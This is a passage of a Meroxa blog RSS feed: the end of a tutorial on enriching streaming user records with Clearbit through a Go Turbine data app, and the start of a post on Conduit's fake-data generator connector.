    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;res&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_activity_enriched&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Enriching Data with Functions&lt;/h3&gt;
&lt;p&gt;Each record will be processed by the &lt;code class=&quot;language-text&quot;&gt;EnrichUserData&lt;/code&gt; function, as seen below. When the program is compiled, this function will be extracted via reflection. Meroxa will automatically create the &lt;a href=&quot;https://en.wikipedia.org/wiki/Directed_acyclic_graph&quot;&gt;DAG&lt;/a&gt; and orchestrate the data through each component (DB &gt; function &gt; DB).&lt;/p&gt;
&lt;p&gt;We included some additional magic in the &lt;code class=&quot;language-text&quot;&gt;Payload&lt;/code&gt; methods (&lt;a href=&quot;https://pkg.meroxa.io/github.com/meroxa/turbine-go#Payload&quot;&gt;more info here&lt;/a&gt;). The &lt;code class=&quot;language-text&quot;&gt;.Set&lt;/code&gt; method allows Turbine to modify the payload without having to worry about the underlying format or schema.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; EnrichUserData &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f EnrichUserData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;stream &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; i&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; stream &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Got email: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        UserDetails&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;EnrichUserEmail&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        
        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error enriching user data: &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;break&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        
        log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Got UserDetails: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;full_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;FullName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Company&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;location&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Location&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;role&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Role&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;seniority&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Seniority&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error setting value: &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;break&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        
        stream&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record
   &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
   
   &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; stream
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
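&lt;p&gt;The same per-record loop can be sketched outside of Turbine with plain Go. The snippet below is a standalone analogue, not the real Turbine API: it uses a simplified Record type whose payload is just a map (the actual turbine.Record exposes Payload Get/Set methods), and it fakes the Clearbit lookup. It only illustrates the loop shape: read a field, derive new fields, and store the modified record back at the same index.&lt;/p&gt;

```go
package main

import "fmt"

// Record is a simplified stand-in for turbine.Record, used only for this
// sketch: the payload is just a map instead of Turbine's Payload type.
type Record struct {
	Payload map[string]any
}

// enrich mirrors the shape of EnrichUserData.Process: walk the slice,
// derive new fields from the email, write them into the payload, and
// store the modified record back at the same index.
func enrich(stream []Record) []Record {
	for i, record := range stream {
		email, ok := record.Payload["email"].(string)
		if !ok {
			continue // skip records without a string email field
		}
		// A real app would call EnrichUserEmail here; we fake the lookup.
		record.Payload["full_name"] = "User for " + email
		stream[i] = record
	}
	return stream
}

func main() {
	out := enrich([]Record{{Payload: map[string]any{"email": "devaris@meroxa.io"}}})
	fmt.Println(out[0].Payload["full_name"]) // User for devaris@meroxa.io
}
```

&lt;p&gt;Writing the record back via stream[i] matters because range yields a copy of each element.&lt;/p&gt;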
&lt;h3&gt;Testing Locally and Deploying to Production&lt;/h3&gt;
&lt;p&gt;Modify your &lt;code class=&quot;language-text&quot;&gt;app.json&lt;/code&gt; to match your resource name and fixture file location. In this example, our fixtures are in &lt;code class=&quot;language-text&quot;&gt;fixtures/pg.json&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;resources&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fixtures/pg.json&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;pg.json&lt;/code&gt; file should have a property that matches the collection specified in &lt;code class=&quot;language-text&quot;&gt;app.go&lt;/code&gt;. In this example, we’re using &lt;code class=&quot;language-text&quot;&gt;user_activity&lt;/code&gt;. Our app will take the email address in the &lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; object, send it to Clearbit, and return the data we specified in &lt;code class=&quot;language-text&quot;&gt;clearbit.go&lt;/code&gt;.&lt;/p&gt;
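&lt;p&gt;For reference, a minimal fixture file could be shaped like the example below. The exact schema here is an assumption for illustration (see the example repo for the canonical fixture format); the important part is that the top-level property name matches the collection referenced in app.go.&lt;/p&gt;

```json
{
  "user_activity": [
    {
      "payload": {
        "id": 1,
        "activity": "registered",
        "email": "devaris@meroxa.io"
      }
    }
  ]
}
```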
&lt;p&gt;&lt;strong&gt;Data record before running&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;activity&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;registered&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;updated_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643214353680&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;user_id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;108&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;created_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643214353680&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;deleted_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;devaris@meroxa.io&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Data record after running&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;activity&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;logged in&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Meroxa&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;created_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643411169715&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;deleted_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;devaris@meroxa.io&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;full_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;DeVaris Brown&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;location&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Oakland, CA, US&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;role&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;leadership&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;seniority&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;executive&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;updated_at&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1643411169715&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;user_id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;108&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That looks good, so let’s deploy this data app into production by running &lt;code class=&quot;language-text&quot;&gt;meroxa apps deploy&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  Checking for uncommitted changes...
  ✔ No uncommitted changes!
  Validating branch...
  ✔ Deployment allowed from main branch!
  Preparing application &quot;meroxa-clearbit&quot; (golang) for deployment...
  ✔ Application built!
  ✔ Can access to your Turbine resources
  ✔ Application processes found. Creating application image...
  ✔ Platform source fetched!
  ✔ Source uploaded!
  ✔ Successfully built Process image! (&quot;fe983a75-fcb5-469f-a133-86647631ce85&quot;)
  ✔ Deploy complete!
  ✔ Application &quot;meroxa-clearbit&quot; successfully created!&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And now we’re done!&lt;/p&gt;
&lt;h2&gt;Recap&lt;/h2&gt;
&lt;p&gt;This data app showed how easy data activation can be without requiring a user to stitch together a bunch of point solutions. With idiomatic code and the Meroxa Turbine SDK, we can now process and enrich data in real time using the Clearbit API.&lt;/p&gt;
&lt;p&gt;If you’d like to see more data app examples, please feel free to make your request in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt;. Otherwise, get started by &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;requesting a free demo of Meroxa&lt;/a&gt; and build something cool. Your app could also be featured in our “Data App Spotlight” series.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Using Conduit to Generate Fake Data for Streaming Systems]]></title><description><![CDATA[Testing streaming systems and architectures can be difficult because you need to mock data and have an upstream system continuously push that mock data. Conduit has made it easier with a built-in generator that creates fake data for streaming systems.]]></description><link>https://meroxa.com/blog/using-conduit-to-generate-fake-data-for-streaming-systems</link><guid isPermaLink="false">https://meroxa.com/blog/using-conduit-to-generate-fake-data-for-streaming-systems</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Tue, 02 Aug 2022 13:23:52 GMT</pubDate><content:encoded>&lt;p&gt;Testing streaming systems and architectures can be difficult because you need to mock data and have an upstream system continuously push that mock data. This post is about how to set up Conduit’s data generator connector.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator connector&lt;/a&gt; is built into Conduit. You don’t need to download an external connector to get started. The connector has a number of capabilities like controlling the content it generates (a struct or a file), the format (structured payloads and raw payloads) and the amount and frequency of data generated. With this connector, you’ll be able to test the flow of data through your streaming systems.&lt;/p&gt;
&lt;h3&gt;The example&lt;/h3&gt;
&lt;p&gt;Our example will be a simple pipeline, with a generator source and a file destination. The generator source will be generating records, which will then be written to a file.&lt;/p&gt;
&lt;h3&gt;Setting up Conduit&lt;/h3&gt;
&lt;p&gt;We will use the &lt;a href=&quot;https://github.com/ConduitIO/conduit/pkgs/container/conduit&quot;&gt;Docker image&lt;/a&gt; in this example (you can also download a &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;binary&lt;/a&gt; or you can &lt;a href=&quot;https://github.com/ConduitIO/conduit#build-from-source&quot;&gt;build the code&lt;/a&gt; yourself). Open up your terminal and run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;docker run -p 8080:8080 --rm ghcr.io/conduitio/conduit:latest&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s it, Conduit is up and running!&lt;/p&gt;
&lt;h3&gt;Creating the pipeline&lt;/h3&gt;
&lt;p&gt;We will use Conduit’s HTTP &lt;a href=&quot;https://github.com/ConduitIO/conduit#api&quot;&gt;API&lt;/a&gt; to create the pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;curl -Ss -X POST &apos;http://localhost:8080/v1/pipelines&apos; -d &apos;
{
  &quot;config&quot;: {
  	&quot;name&quot;: &quot;my-pipeline&quot;,
    &quot;description&quot;: &quot;My pipeline&quot;
  }
}&apos; | jq&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We use jq here to pretty-print the output and more easily spot the pipeline ID, which we will use in the next steps. You’ll get something like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;93d11532-504f-4591-b7b6-c130a54043ac&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;state&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;status&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;STATUS_STOPPED&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;error&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;config&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-pipeline&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;My pipeline&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;connectorIds&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
